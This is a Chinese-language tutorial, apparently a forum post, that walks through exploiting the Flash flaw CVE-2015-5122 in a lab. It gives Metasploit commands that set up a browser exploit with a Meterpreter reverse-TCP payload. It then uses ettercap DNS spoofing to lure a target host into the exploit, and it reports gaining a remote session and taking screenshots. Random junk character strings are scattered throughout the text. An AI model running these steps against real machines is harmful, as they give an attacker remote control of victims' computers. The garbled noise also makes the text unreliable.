|
1 v; f1 v- w' O9 n 二、cve2015-5122漏洞实例演示虚拟机 * F/ j: n" ?8 ?: x& }0 z
: e) W" m9 u, O+ `3 \2 F
% J0 l5 Y4 x- P$ H* w8 G
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
$ G% D% k! {5 E# z6 U) Y % z' I1 l- C2 T9 U$ Z/ p( B6 x3 Q
2 a. [! L' w; \, t, _$ C
search cve-2015-5122如图: + n: @6 b+ i& X: P% J' }: T
5 Y& l+ v; [. t$ l; ] p4 l
. J: C7 F0 [2 v9 }2 s
$ e5 W8 H6 X4 [! _9 v 4 w$ O2 T5 z/ U; S6 v
g5 s1 n! M$ z7 g4 {. {
下面我们敲如下命令: & l. x' Z% Y6 z3 S/ A6 }" _/ W
% C* W! \7 q. n" n& A' D' T
C- | x$ a+ v7 e( g use exploit/multi/browser/adobe_flash_opaque_background_uaf 7 I( b" W% Q* T
1 I5 ?9 v0 k$ f; V5 J; u! z" _; N8 z3 V z. U3 g8 p0 K1 ~+ V" B
set PAYLOAD windows/meterpreter/reverse_tcp
* G, f$ h- ^1 q( |0 {2 Z 1 |% Z- M! B' X' s5 B$ Q
b. X( _! ]: ^& Q set LHOST 192.168.0.109 ) C8 J9 q6 h5 Y4 R$ c) r
5 A7 M6 H1 Y S3 a" t3 M7 \6 Y5 v; p- X- l& @3 I5 h/ P3 D- J
set URIPATH / /*根目录*/ 0 R9 F) k) ?: i5 d( `+ L
' u; Q9 h# R: B5 S7 q! \6 }' q( K# E) ~
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
/ y& v+ ^7 H9 E2 e4 l' E6 y7 b 1 j& t! I& D* q/ i' C0 ]" U; C
, n- m3 c4 i' ^( h& a
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
0 H1 z( [$ b( Y" } Y3 V
. Y- n" y F$ H
5 A( {+ v, e) i/ j* Z4 G, ]& J4 w1 J 然后show options如图: 6 Y8 c8 Z. I+ P+ u' G3 ?
: r( h! X, D1 a3 Z) X: t) G( l' d! a% P+ E! ?
4 N) |) K' M' E$ @' e5 T* s
' s4 b! ^. v* U9 J* F, R8 P; U
' c6 c% G) E5 S0 d" A% f) u; l% o0 L 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
4 \: V% \8 I- ?$ I* F + |( l8 ~7 y* |# S* ~8 V/ p
; k% m$ @) }9 P3 g/ q9 w* b; k- E
! x, V& R6 d1 F8 L 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 , l$ z4 U3 s x; l3 Y; V/ ]
. B, y* ^3 e7 }, w
9 J& o: x4 }3 x& h5 ?. s Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 _: q3 F8 S) ^; A1 j2 y7 O! u7 s8 _
6 V; w8 N0 O- d
- L) X3 X' G/ _9 r5 [) |' W6 Q7 V" m1 h; U
; v0 y* |( A! a E! S8 X, h: \
7 x! \; Z2 @) v. Q+ R! l0 v! F8 q
成功了,这时候我们断开ettercap,如图: # D9 v" e5 i+ o5 q1 p+ r Q7 k" W2 F
& l O- Z& \9 L9 e0 ~' z9 ?3 i* _( Q. a4 N& [
* s/ b3 W" i* h" u6 \+ b5 x
, T. K) H9 S ^. e0 @0 u( h6 Q; {
+ U; o( M o. Q- Q
Screenshot如图:
% w$ Y3 F0 `- z. U 0 M- ?- y5 b' y# T, |# A2 l
5 X% n7 E6 V1 u$ G% u - y& X% ?+ `( @" j9 ]) f- A
2 C7 R; V3 [6 W" K7 K
* q2 t( }2 w) |( P8 V% l& r; S4 M
7 d# x2 Z' s% D" e; J9 f
|